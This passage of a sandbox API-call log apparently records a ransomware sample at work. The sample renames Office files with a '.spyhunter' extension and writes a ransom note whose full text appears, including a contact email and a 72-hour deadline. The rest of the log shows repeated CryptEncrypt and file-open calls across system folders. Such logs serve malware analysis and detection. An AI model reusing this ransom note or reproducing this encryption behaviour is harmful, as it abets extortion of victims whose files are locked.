shared\\OFFICE14\\Csi.dll.spyhunter") returned 83 [0178.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll.spyhunter")) returned 1 [0178.910] GetProcessHeap () returned 0x2c0000 [0178.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.910] GetProcessHeap () returned 0x2c0000 [0178.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.911] GetProcessHeap () returned 0x2c0000 [0178.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee41d0 | out: hHeap=0x2c0000) returned 1 [0178.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.912] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.912] WriteFile (in: hFile=0x9c, lpBuffer=0x57e313*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e43c, lpOverlapped=0x0 | out: lpBuffer=0x57e313*, lpNumberOfBytesWritten=0x57e43c*=0x127, lpOverlapped=0x0) returned 1 [0178.912] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.912] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e43c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e43c*=0x2ac, lpOverlapped=0x0) returned 1 [0178.913] CloseHandle (hObject=0x9c) returned 1 [0178.913] GetProcessHeap () returned 0x2c0000 [0178.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8940 | out: hHeap=0x2c0000) returned 1 [0178.913] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3d8 | out: pbBuffer=0x57e3d8) returned 1 [0178.913] GetProcessHeap () returned 0x2c0000 [0178.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.913] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3d0*=0x30) returned 1 [0178.913] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.914] GetProcessHeap () returned 0x2c0000 [0178.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.914] GetProcessHeap () returned 0x2c0000 [0178.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c390 | out: hHeap=0x2c0000) returned 1 [0178.914] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3d8 | out: pbBuffer=0x57e3d8) returned 1 [0178.914] GetProcessHeap () returned 0x2c0000 [0178.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.914] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3d0*=0x30) returned 1 [0178.914] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.915] GetProcessHeap () returned 0x2c0000 [0178.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.915] GetProcessHeap () returned 0x2c0000 [0178.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c2b8 | out: hHeap=0x2c0000) returned 1 [0178.915] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3d0 | out: pbBuffer=0x57e3d0) returned 1 [0178.915] GetProcessHeap () returned 0x2c0000 [0178.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.915] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3c8*=0x30) returned 1 [0178.915] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tabtip32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.916] GetProcessHeap () returned 0x2c0000 [0178.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.916] GetProcessHeap () returned 0x2c0000 [0178.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee40f0 | out: hHeap=0x2c0000) returned 1 [0178.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3d0 | out: pbBuffer=0x57e3d0) returned 1 [0178.916] GetProcessHeap () returned 0x2c0000 [0178.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.916] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3c8*=0x30) returned 1 [0178.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.916] GetProcessHeap () returned 0x2c0000 [0178.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.916] GetProcessHeap () returned 0x2c0000 [0178.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c1e0 | out: hHeap=0x2c0000) returned 1 [0178.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3c8 | out: pbBuffer=0x57e3c8) returned 1 [0178.916] GetProcessHeap () returned 0x2c0000 [0178.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.916] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3c0*=0x30) returned 1 [0178.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchobj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.917] GetProcessHeap () returned 0x2c0000 [0178.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.917] GetProcessHeap () returned 0x2c0000 [0178.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4010 | out: hHeap=0x2c0000) returned 1 [0178.917] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3c8 | out: pbBuffer=0x57e3c8) returned 1 [0178.917] GetProcessHeap () returned 0x2c0000 [0178.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.917] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3c0*=0x30) returned 1 [0178.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.917] GetProcessHeap () returned 0x2c0000 [0178.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.917] GetProcessHeap () returned 0x2c0000 [0178.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c108 | out: hHeap=0x2c0000) returned 1 [0178.918] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3c0 | out: pbBuffer=0x57e3c0) returned 1 [0178.918] GetProcessHeap () returned 0x2c0000 [0178.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.918] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3b8*=0x30) returned 1 [0178.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.918] GetProcessHeap () returned 0x2c0000 [0178.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.918] GetProcessHeap () returned 0x2c0000 [0178.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c030 | out: hHeap=0x2c0000) returned 1 [0178.918] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3c0 | out: pbBuffer=0x57e3c0) returned 1 [0178.918] GetProcessHeap () returned 0x2c0000 [0178.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.918] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3b8*=0x30) returned 1 [0178.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.918] GetProcessHeap () returned 0x2c0000 [0178.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.918] GetProcessHeap () returned 0x2c0000 [0178.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3f30 | out: hHeap=0x2c0000) returned 1 [0178.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3b8 | out: pbBuffer=0x57e3b8) returned 1 [0178.919] GetProcessHeap () returned 0x2c0000 [0178.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.919] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3b0*=0x30) returned 1 [0178.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.919] GetProcessHeap () returned 0x2c0000 [0178.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.919] GetProcessHeap () returned 0x2c0000 [0178.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3e50 | out: hHeap=0x2c0000) returned 1 [0178.920] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3b8 | out: pbBuffer=0x57e3b8) returned 1 [0178.920] GetProcessHeap () returned 0x2c0000 [0178.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.920] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3b0*=0x30) returned 1 [0178.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penusa.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.920] GetProcessHeap () returned 0x2c0000 [0178.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.920] GetProcessHeap () returned 0x2c0000 [0178.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7bf58 | out: hHeap=0x2c0000) returned 1 [0178.920] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3b0 | out: pbBuffer=0x57e3b0) returned 1 [0178.920] GetProcessHeap () returned 0x2c0000 [0178.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.920] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3a8*=0x30) returned 1 [0178.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penkor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.920] GetProcessHeap () returned 0x2c0000 [0178.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.920] GetProcessHeap () returned 0x2c0000 [0178.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7be80 | out: hHeap=0x2c0000) returned 1 [0178.921] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3b0 | out: pbBuffer=0x57e3b0) returned 1 [0178.921] GetProcessHeap () returned 0x2c0000 [0178.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.921] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3a8*=0x30) returned 1 [0178.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penjpn.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.921] GetProcessHeap () returned 0x2c0000 [0178.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.921] GetProcessHeap () returned 0x2c0000 [0178.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7bda8 | out: hHeap=0x2c0000) returned 1 [0178.921] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3a8 | out: pbBuffer=0x57e3a8) returned 1 [0178.921] GetProcessHeap () returned 0x2c0000 [0178.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.921] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3a0*=0x30) returned 1 [0178.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pencht.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.921] GetProcessHeap () returned 0x2c0000 [0178.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.922] GetProcessHeap () returned 0x2c0000 [0178.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7bcd0 | out: hHeap=0x2c0000) returned 1 [0178.922] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3a8 | out: pbBuffer=0x57e3a8) returned 1 [0178.922] GetProcessHeap () returned 0x2c0000 [0178.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.922] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3a0*=0x30) returned 1 [0178.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penchs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.922] GetProcessHeap () returned 0x2c0000 [0178.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.922] GetProcessHeap () returned 0x2c0000 [0178.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7bbf8 | out: hHeap=0x2c0000) returned 1 [0178.922] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3a0 | out: pbBuffer=0x57e3a0) returned 1 [0178.922] GetProcessHeap () returned 0x2c0000 [0178.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.922] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e398*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e398*=0x30) returned 1 [0178.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.922] GetProcessHeap () returned 0x2c0000 [0178.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.923] GetProcessHeap () returned 0x2c0000 [0178.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3d70 | out: hHeap=0x2c0000) returned 1 [0178.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e3a0 | out: pbBuffer=0x57e3a0) returned 1 [0178.923] GetProcessHeap () returned 0x2c0000 [0178.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.923] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e398*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e398*=0x30) returned 1 [0178.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.923] GetProcessHeap () returned 0x2c0000 [0178.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.923] GetProcessHeap () returned 0x2c0000 [0178.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3c90 | out: hHeap=0x2c0000) returned 1 [0178.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e398 | out: pbBuffer=0x57e398) returned 1 [0178.923] GetProcessHeap () returned 0x2c0000 [0178.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.923] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e390*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e390*=0x30) returned 1 [0178.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.923] GetProcessHeap () returned 0x2c0000 [0178.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.924] GetProcessHeap () returned 0x2c0000 [0178.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7bb20 | out: hHeap=0x2c0000) returned 1 [0178.924] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e398 | out: pbBuffer=0x57e398) returned 1 [0178.924] GetProcessHeap () returned 0x2c0000 [0178.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e390*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e390*=0x30) returned 1 [0178.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.924] GetProcessHeap () returned 0x2c0000 [0178.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.924] GetProcessHeap () returned 0x2c0000 [0178.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ba48 | out: hHeap=0x2c0000) returned 1 [0178.924] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e390 | out: pbBuffer=0x57e390) returned 1 [0178.924] GetProcessHeap () returned 0x2c0000 [0178.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e388*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e388*=0x30) returned 1 [0178.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.924] GetProcessHeap () returned 0x2c0000 [0178.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.925] GetProcessHeap () returned 0x2c0000 [0178.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8858 | out: hHeap=0x2c0000) returned 1 [0178.925] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e390 | out: 